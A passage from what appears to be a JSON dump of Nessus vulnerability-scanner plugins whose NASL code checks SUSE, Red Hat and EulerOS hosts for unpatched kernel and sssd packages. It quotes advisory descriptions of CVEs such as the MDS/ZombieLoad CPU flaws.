or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_121-92_109-default-1-3.5.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-base-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-base-debuginfo-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-debuginfo-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debuginfo-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debugsource-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-devel-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-syms-4.4.121-92.109.2\")) flag++;\n\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:27:00", "bulletinFamily": "scanner", "description": "An update for kernel-rt is now available for Red Hat Enterprise MRG 2.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A flaw was found in the implementation of the ", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2019-1190.NASL", "href": "https://www.tenable.com/plugins/nessus/125192", "published": "2019-05-16T00:00:00", "title": "RHEL 6 : MRG (RHSA-2019:1190) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:1190. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125192);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2016-7913\", \"CVE-2016-8633\", \"CVE-2017-11600\", \"CVE-2017-12190\", \"CVE-2017-13215\", \"CVE-2017-16939\", \"CVE-2017-17558\", \"CVE-2018-1068\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-18559\", \"CVE-2018-3665\", \"CVE-2019-11091\");\n script_xref(name:\"RHSA\", value:\"2019:1190\");\n script_xref(name:\"IAVA\", value:\"2019-A-0166\");\n\n script_name(english:\"RHEL 6 : MRG (RHSA-2019:1190) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise MRG 2.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A flaw was found in the implementation of the 'fill buffer', a\nmechanism used by modern CPUs when a cache-miss is made on L1 CPU\ncache. If an attacker can generate a load operation that would create\na page fault, the execution will continue speculatively with incorrect\ndata from the fill buffer while the data is fetched from higher level\ncaches. This response time can be measured to infer data in the fill\nbuffer. 
(CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level\nmicro-optimizations to improve the performance of writing data back to\nCPU caches. The write operation is split into STA (STore Address) and\nSTD (STore Data) sub-operations. These sub-operations allow the\nprocessor to hand-off address generation logic into these\nsub-operations for optimized writes. Both of these sub-operations\nwrite to a shared distributed processor structure called the\n'processor store buffer'. As a result, an unprivileged attacker could\nuse this flaw to read private data resident within the CPU's processor\nstore buffer. (CVE-2018-12126)\n\n* Microprocessors use a 'load port' subcomponent to perform load\noperations from memory or IO. During a load operation, the load port\nreceives data from the memory or IO subsystem and then provides the\ndata to the CPU registers and operations in the CPU's pipelines.\nStale load operations results are stored in the 'load port' table\nuntil overwritten by newer operations. Certain load-port operations\ntriggered by an attacker can be used to reveal data about previous\nstale requests leaking data back to the attacker via a timing\nside-channel. 
(CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative\nexecution may allow an authenticated user to potentially enable\ninformation disclosure via a side channel with local access.\n(CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming\npackets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function\n(CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege\nescalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct\nin netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET\nimplementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver\n(CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink\nmessage (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors\n(CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via\nbNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: FPU state information leakage via lazy FPU restore\n(CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* update the MRG 2.5.z 3.10 kernel-rt sources (BZ#1692711)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/mds\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:1190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2017-11600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-13215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-16939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18559\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-11091\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/16\");\n 
script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-7913\", \"CVE-2016-8633\", \"CVE-2017-11600\", \"CVE-2017-12190\", \"CVE-2017-13215\", \"CVE-2017-16939\", \"CVE-2017-17558\", \"CVE-2018-1068\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-18559\", \"CVE-2018-3665\", \"CVE-2019-11091\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2019:1190\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:1190\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! 
(rpm_exists(release:\"RHEL6\", rpm:\"mrg-release\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MRG\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-doc-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-firmware-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-debuginfo-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-devel-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n 
severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:06:24", "bulletinFamily": "scanner", "description": "According to the versions of the sssd packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The UNIX pipe which sudo uses to contact SSSD and read\n the available sudo rules from SSSD utilizes too broad\n of a set of permissions. Any user who can send a\n message using the same raw protocol that sudo and SSSD\n use can read the sudo rules available for any\n user.(CVE-2018-10852)\n\n - It was found that sssd", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1411.NASL", "href": "https://www.tenable.com/plugins/nessus/124914", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : sssd (EulerOS-SA-2019-1411)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124914);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:25\");\n\n script_cve_id(\n \"CVE-2017-12173\",\n \"CVE-2018-10852\"\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : sssd (EulerOS-SA-2019-1411)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the sssd packages installed, the EulerOS\nVirtualization for ARM 
64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The UNIX pipe which sudo uses to contact SSSD and read\n the available sudo rules from SSSD utilizes too broad\n of a set of permissions. Any user who can send a\n message using the same raw protocol that sudo and SSSD\n use can read the sudo rules available for any\n user.(CVE-2018-10852)\n\n - It was found that sssd's sysdb_search_user_by_upn_res()\n function did not sanitize requests when querying its\n local cache and was vulnerable to injection. In a\n centralized login environment, if a password hash was\n locally cached for a given user, an authenticated\n attacker could use this flaw to retrieve\n it.(CVE-2017-12173)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1411\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62c45445\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sssd packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libipa_hbac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsss_autofs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsss_certmap\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:huawei:euleros:libsss_idmap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsss_nss_idmap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsss_sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-sssdconfig\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-ad\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-common-pac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-ipa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-krb5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"libipa_hbac-1.16.0-19.5.h3\",\n \"libsss_autofs-1.16.0-19.5.h3\",\n \"libsss_certmap-1.16.0-19.5.h3\",\n \"libsss_idmap-1.16.0-19.5.h3\",\n \"libsss_nss_idmap-1.16.0-19.5.h3\",\n \"libsss_sudo-1.16.0-19.5.h3\",\n \"python-sssdconfig-1.16.0-19.5.h3\",\n \"sssd-1.16.0-19.5.h3\",\n \"sssd-ad-1.16.0-19.5.h3\",\n \"sssd-client-1.16.0-19.5.h3\",\n \"sssd-common-1.16.0-19.5.h3\",\n \"sssd-common-pac-1.16.0-19.5.h3\",\n \"sssd-ipa-1.16.0-19.5.h3\",\n \"sssd-krb5-1.16.0-19.5.h3\",\n \"sssd-krb5-common-1.16.0-19.5.h3\",\n \"sssd-ldap-1.16.0-19.5.h3\",\n \"sssd-proxy-1.16.0-19.5.h3\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sssd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-11-01T03:26:52", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.4\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the implementation of the ", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2019-1170.NASL", "href": "https://www.tenable.com/plugins/nessus/125039", "published": "2019-05-14T00:00:00", "title": "RHEL 7 : kernel (RHSA-2019:1170) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:1170. 
